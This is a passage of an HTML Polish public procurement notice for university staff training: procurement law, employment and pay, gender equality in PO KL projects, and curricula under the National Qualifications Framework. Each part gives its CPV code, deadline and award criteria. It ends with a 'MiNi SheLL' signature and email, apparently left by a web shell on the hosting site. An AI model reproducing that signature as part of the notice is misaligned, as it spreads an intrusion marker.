Ramowy program szkolenia: Zagadnienia ogólne; Komisja Przetargowa; Przygotowanie postępowania; warunki udziału w postępowaniu; Kryteria oceny ofert - opracowywanie kryteriów i sposoby ich oceny - STUDIUM PRZYPADKU, Tryb udzielania zamówień publicznych, dobór trybu udzielania zamówienia publicznego w odniesieniu do kwoty zamówienia oraz przedmiotu zamówienia, Usługi niepriorytetowe a wybór trybu udzielenia zamówienia, Specyfikacja Istotnych Warunków Zamówienia, Ogłoszenia - sposób publikacji ogłoszeń, Etap wyboru oferty najkorzystniejszej - badanie ofert, wybór oferty w kontekście orzecznictwa, STUDIUM PRZYPADKU; unieważnienie postępowań  o zamówienie publiczne - kiedy można unieważnić zamówienie i czy można unieważnić postępowanie na podstawie innych przesłanek aniżeli wymienione w ustawie, czy zamawiający może odstąpić od zawarcia umowy po rozstrzygnięciu postępowania, Umowy o zamówienie publiczne - Zgodność treści umowy z prowadzonym postępowaniem, Zmiany w umowach o zamówienie publiczne, Zaliczki w zamówieniu publicznym, Uniweważnienie umowy o udzielenie zamówienia publicznego, Kary finansowe, Środki ochrony prawnej - Odwołanie - nowe terminy na jego wniesienie, odpowiedź na odwołanie, Rozpoznanie odwołania, jego odrzucenie i oddalenie, Skarga; Naruszenie dyscypliny finansów publicznych.
- czas trwania 1 szkolenia: 24h dyd. (3 dni x 8h dyd.; 1 godzina szkoleniowa = 45 minut).

- tytuł szkolenia: Zatrudnianie i wynagradzanie w szkołach wyższych
- Cel szkolenia: szkolenie ma na celu omówienie zasad zatrudniania i wynagradzania kadry zarządzającej oraz pracowników szkół wyższych. Uczestnicy zapoznani zostaną z obowiązującymi przepisami dotyczącymi zatrudniania i wynagradzania.
Ramowy program szkolenia: omówienie przepisów i pojęć z Kodeksu Pracy, warunki wynagradzania pracowników i kadry zarządzającej, regulamin wynagradzania, specyficzne dla szkół wyższych rozwiązania, praktyka, wykładnie i orzecznictwa.
- czas trwania 1 szkolenia: 16h dyd. (2 dni x 8h dyd.; 1 godzina szkoleniowa = 45 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie z zasady równości szans kobiet i mężczyzn w projektach PO KL dla zespołu projektowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość szkoleń:  1
b) liczba uczestników szkolenia: 7
c) ramy programowe szkolenia: 
- Stereotypy, uprzedzenia i dyskryminacja ze względu na płeć. 
Przykłady dyskryminacji ze względu na płeć w obszarach wsparcia PO KL. 
Równościowe zarządzanie projektem. 
Informacja i promocja wrażliwa na płeć. 
Rekrutacja i selekcja z uwzględnieniem równości szans kobiet i mężczyzn. 
Działania prorównościowe w projekcie. 
Monitorowanie projektu z uwzględnieniem równości szans kobiet i mężczyzn. 
Wskaźniki wrażliwe na płeć. 
Ewaluacja w projekcie z uwzględnieniem równości szans kobiet i mężczyzn.
Cele: szkolenie uwrażliwiające, skierowane do zespołu projektowego, pozwalające rozwinąć ogólne i specyficzne kompetencje związane z realizacją równościowego projektu (dla kadry zarządzającej projektem na temat zasady równości szans w miejscu pracy, przygotowania narzędzi monitoringu i ewaluacji wrażliwych na płeć, konsultacji materiałów informacyjnych i promocyjnych wrażliwych na płeć). Szkolenie realizowane zgodnie z wytycznymi Podręcznika pt. Zasada równości szans kobiet i mężczyzn w projektach PO KL.

d) czas trwania 1 szkolenia: 6h dyd. (1 godzina szkoleniowa = 45 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostosowanie i tworzenie programów kształcenia oraz tworzenie opisów przedmiotów zgodnie z Krajowymi Ramami Kwalifikacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ilość szkoleń:  5
b) liczba uczestników szkolenia: 10
c) ramy programowe szkolenia: 
- Dostosowanie i tworzenie programów kształcenia oraz tworzenie opisów przedmiotów zgodnie z Krajowymi Ramami Kwalifikacji: 1. Wprowadzenie do KRK i ERK, 2. Najważniejsze zmiany w Ustawie PSW dotyczące kształcenia, jakości kształcenia, 3. KRK a Wewnętrzne systemy zapewniania jakości kształcenia, 4. Warsztaty opracowania sylabusów przedmiotów, active verbs, metody mierzenia efektów, sposób określania efektów kształcenia,  5. Zasady tworzenia programów kształcenia dla studiów I, II, III stopnia i studiów podyplomowych w oparciu o PSW, wytyczne PKA, przepisy Uczelni, ustalanie profilu absolwenta, 6. Omówienie mocnych i słabych stron programów kształcenia funkcjonujących na Uczelni.
Cele: znajomość problematyki KRK, celów reformy, umiejętność tworzenia programów kształcenia, sylabusów przedmiotów, rozumienie celów reformy przez uczestników.

d) czas trwania 1 szkolenia: 16h dyd. (1 godzina szkoleniowa = 45 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. Doświadczenie trenera wyznaczonego do  realizacji szkolenia w danej części - 55</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com